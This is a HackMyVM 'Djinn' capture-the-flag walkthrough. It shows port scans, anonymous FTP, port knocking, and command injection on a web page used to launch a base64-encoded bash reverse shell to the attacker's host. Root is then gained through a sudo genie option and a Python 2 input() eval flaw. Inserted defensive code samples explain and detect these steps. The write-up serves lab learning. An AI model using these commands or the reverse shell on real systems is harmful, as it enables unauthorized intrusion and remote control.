HackmyVM-Djinn

  • ~10.07K characters
  1. Reconnaissance
  2. Port 21
  3. Port 1337
  4. Port 7331
  5. Privilege escalation to sam
  6. Privilege escalation to root

Reconnaissance

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:e7:50:e0 PCS Systemtechnik GmbH
192.168.31.176 08:00:27:36:b4:d6 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 3.098 seconds (82.63 hosts/sec). 3 respondeds

192.168.31.176 is the target IP.

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.176 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.176:21
Open 192.168.31.176:1337
Open 192.168.31.176:7331
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 04:49 EDT
Initiating ARP Ping Scan at 04:49
Scanning 192.168.31.176 [1 port]
Completed ARP Ping Scan at 04:49, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:49
Completed Parallel DNS resolution of 1 host. at 04:49, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:49
Scanning 192.168.31.176 [3 ports]
Discovered open port 21/tcp on 192.168.31.176
Discovered open port 1337/tcp on 192.168.31.176
Discovered open port 7331/tcp on 192.168.31.176
Completed SYN Stealth Scan at 04:49, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.31.176
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-05-06 04:49:46 EDT for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
1337/tcp open waste syn-ack ttl 64
7331/tcp open swx syn-ack ttl 64
MAC Address: 08:00:27:36:B4:D6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Port 21

Port 21 allows anonymous login, and the share contains three files:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# ftp anonymous@192.168.31.176
Connected to 192.168.31.176.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||15556|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# cat creds.txt
nitu:81299
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

That gives us a username, one set of credentials, and a hint that a game is running on port 1337.

Port 1337

Connecting with nc presents a mental-arithmetic quiz, so write a script to answer it:

import re
import socket


def get_question(s):
    """Receive one chunk and pull out the question body, e.g. "3, '+', 4"."""
    data = s.recv(1024).decode()
    print(data)
    question_re = re.search(r'(\d.+)\)', data)
    if question_re:
        return question_re.group(1)
    return None


def send_answer(s, answer):
    print(answer)
    s.sendall(answer.encode() + b'\n')


def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.31.176', 1337))
    for _ in range(1, 1002):
        question = get_question(s)
        if not question:
            continue
        print(question)
        # Strip the tuple punctuation so "3, '+', 4" becomes "3 + 4".
        expr = question.replace(',', '').replace("'", '')
        # The text comes from the remote service: only let arithmetic characters
        # reach eval(), otherwise anything the server sends would run locally.
        if not re.fullmatch(r'[\d\s+\-*/%().]+', expr):
            print('unexpected question format, skipping:', expr)
            continue
        answer = str(eval(expr))
        send_answer(s, answer)
    s.close()


if __name__ == '__main__':
    main()
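
The quiz sends each question as a Python-style tuple such as `(3, '+', 4)`, which the script above hands to eval() after stripping commas and quotes. As an added example (not code from the original post), here is a solver for that format that never evaluates server-supplied text: it parses the tuple with a strict pattern and dispatches the operator through a fixed table. The operator set, the rendering of integral division results without ".0", and the sample chunks are assumptions.

```python
import operator
import re

# Operators the quiz is assumed to use; anything else is rejected before evaluation.
OPS = {
    '+': operator.add,
    '-': operator.sub,
    '*': operator.mul,
    '/': operator.truediv,
}

# Strict shape of one question: (<int>, '<op>', <int>), possibly with text around it.
QUESTION_RE = re.compile(r"\(\s*(-?\d+)\s*,\s*'([+\-*/])'\s*,\s*(-?\d+)\s*\)")


def parse_question(data):
    """Return (left, op, right) from one received chunk, or None if no question is present."""
    m = QUESTION_RE.search(data)
    if not m:
        return None
    return int(m.group(1)), m.group(2), int(m.group(3))


def solve(question):
    """Compute the answer through the operator table; integral results drop the '.0'."""
    left, op, right = question
    result = OPS[op](left, right)
    if isinstance(result, float) and result.is_integer():
        result = int(result)
    return str(result)


def answer_line(data):
    """Parse one chunk and return the reply text, or None when there is nothing to answer."""
    q = parse_question(data)
    return None if q is None else solve(q)


# Constructed chunks in the shape the author's regex expects, plus the final gift line
# and an unsupported operator that the strict pattern refuses.
SAMPLES = [
    "Question: (3, '+', 4)\n",
    "(12, '*', 8)\n",
    "(7, '/', 2)\n",
    "(2, '**', 99999999)\n",
    "Here is your gift , I hope you know what to do with it: 1356, 6784, 3409\n",
]

if __name__ == '__main__':
    for chunk in SAMPLES:
        print(repr(chunk.strip()), '->', answer_line(chunk))
```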

At the end it returns "Here is your gift , I hope you know what to do with it: 1356, 6784, 3409", so port-knock with that sequence:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# knock 192.168.31.176 1356 6784 3409

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.176 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.176:21
Open 192.168.31.176:22
Open 192.168.31.176:1337
Open 192.168.31.176:7331
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 05:13 EDT
Initiating ARP Ping Scan at 05:13
Scanning 192.168.31.176 [1 port]
Completed ARP Ping Scan at 05:13, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:13
Completed Parallel DNS resolution of 1 host. at 05:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:13
Scanning 192.168.31.176 [4 ports]
Discovered open port 21/tcp on 192.168.31.176
Discovered open port 22/tcp on 192.168.31.176
Discovered open port 7331/tcp on 192.168.31.176
Discovered open port 1337/tcp on 192.168.31.176
Completed SYN Stealth Scan at 05:13, 0.02s elapsed (4 total ports)
Nmap scan report for 192.168.31.176
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-05-06 05:13:30 EDT for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
1337/tcp open waste syn-ack ttl 64
7331/tcp open swx syn-ack ttl 64
MAC Address: 08:00:27:36:B4:D6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Port 22 is now open, but the credentials found earlier do not work on it.

Port 7331

Next, look at what port 7331 serves. A directory scan turns up /wish, a page that executes commands. After submitting a command it redirects to http://192.168.31.176:7331/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A, so the command really was executed and its output is reflected in the URL. Use it to get a reverse shell:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjEyOS80NDQ0IDA+JjE=|base64 -d |bash
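
Because /wish reflects the command output into the /genie?name= redirect, the output also lands in the web server's access log. As an added example (not part of the original writeup), this detection routine parses constructed combined-format log lines and flags /genie requests whose name parameter contains shapes that only shell output produces, such as id(1) output or /etc/passwd rows. The log lines, the log format, and the set of output signatures are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined format). The second one mirrors the redirect the
# walkthrough observed after running `id` through /wish; the third is an ordinary name.
LOG_LINES = [
    '192.168.31.129 - - [06/May/2025:05:20:01 -0400] "GET /wish HTTP/1.1" 200 512 "-" "curl/8.5"',
    '192.168.31.129 - - [06/May/2025:05:20:07 -0400] "GET /genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A HTTP/1.1" 200 640 "-" "curl/8.5"',
    '192.168.31.50 - - [06/May/2025:05:21:00 -0400] "GET /genie?name=Alice HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Shapes that shell commands, not people, put into the name field: id(1) output and
# /etc/passwd rows. Extend the alternation as other leaked outputs are identified.
COMMAND_OUTPUT_RE = re.compile(r'uid=\d+\(|gid=\d+\(|\S+:x:\d+:\d+:')


def parse_line(line):
    """Split one log line into source, timestamp, method, path, decoded query and status."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    return {'src': src, 'ts': ts, 'method': method, 'path': parts.path,
            'query': parse_qs(parts.query), 'status': int(status)}


def suspicious(entry):
    """True when a /genie request carries command output in its name parameter."""
    if entry is None or entry['path'] != '/genie':
        return False
    return any(COMMAND_OUTPUT_RE.search(v) for v in entry['query'].get('name', []))


def flagged_requests(lines):
    """Return the parsed entries that look like reflected command execution."""
    return [e for e in map(parse_line, lines) if suspicious(e)]


if __name__ == '__main__':
    for e in flagged_requests(LOG_LINES):
        print(e['ts'], e['src'], e['path'], e['query']['name'][0].strip())
```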

Privilege escalation to sam

There is a credential file under /home/nitish/.dev:

www-data@djinn:/home/nitish/.dev$ cat creds.txt
nitish:p4ssw0rdStr3r0n9
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
nitish@djinn:~$ sudo -u sam /usr/bin/genie -c '/bin/sh'
Pass your wish to GOD, he might be able to help you.

Hahaha, -c does not work. Looking at the other options, the man page also lists a -cmd parameter:

nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd id
my man!!
$

Privilege escalation to root

sam@djinn:~$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago

sam's home directory contains a .pyc file; decompiling it gives:

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 2.7

from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    # randint() is inclusive on both ends, so the secret can be 101 despite the prompt.
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    # Python 2 input() evaluates the typed text as an expression in this scope,
    # so typing the name "num" yields the secret itself.
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    # Same input() pitfall here: the choice is evaluated before int() sees it.
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())

You can simply type num: the program evaluates what you enter as an expression, so num resolves to the variable holding the secret and the comparison passes. Brute-forcing would also work, but I won't try that.
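
To make the flaw concrete, here is an added example (not part of the original writeup) that models the guessit() check in Python 3: under Python 2, input() is eval(raw_input()), so the typed text is evaluated with the local name num in scope, which the model reproduces with an explicit eval(). The hardened variant beside it parses digits only and enforces the stated range. The function names, the seeded generator, and the sample inputs are assumptions.

```python
import random


def python2_style_check(typed, num):
    """Model of guessit(): under Python 2, input() is eval(raw_input()), so the typed
    text is evaluated as an expression with the local name `num` in scope."""
    s = eval(typed, {"__builtins__": {}}, {"num": num})
    return s == num


def hardened_check(typed, num):
    """Fixed version: parse digits only, never evaluate, and enforce the stated range."""
    typed = typed.strip()
    if not typed.isdigit():
        return False
    guess = int(typed)
    if not 1 <= guess <= 100:
        return False
    return guess == num


def play(check, typed, seed=0):
    """Draw the secret the way the original does (randint(1, 101)) and apply a check.
    A seeded generator keeps the demo reproducible; the real program is unseeded."""
    num = random.Random(seed).randint(1, 101)
    return check(typed, num)


if __name__ == "__main__":
    print("python2-style input(), typed 'num':", play(python2_style_check, "num"))
    print("hardened check,         typed 'num':", play(hardened_check, "num"))
    print("hardened check,         typed '50': ", play(hardened_check, "50"))
```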

sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# id
uid=0(root) gid=0(root) groups=0(root)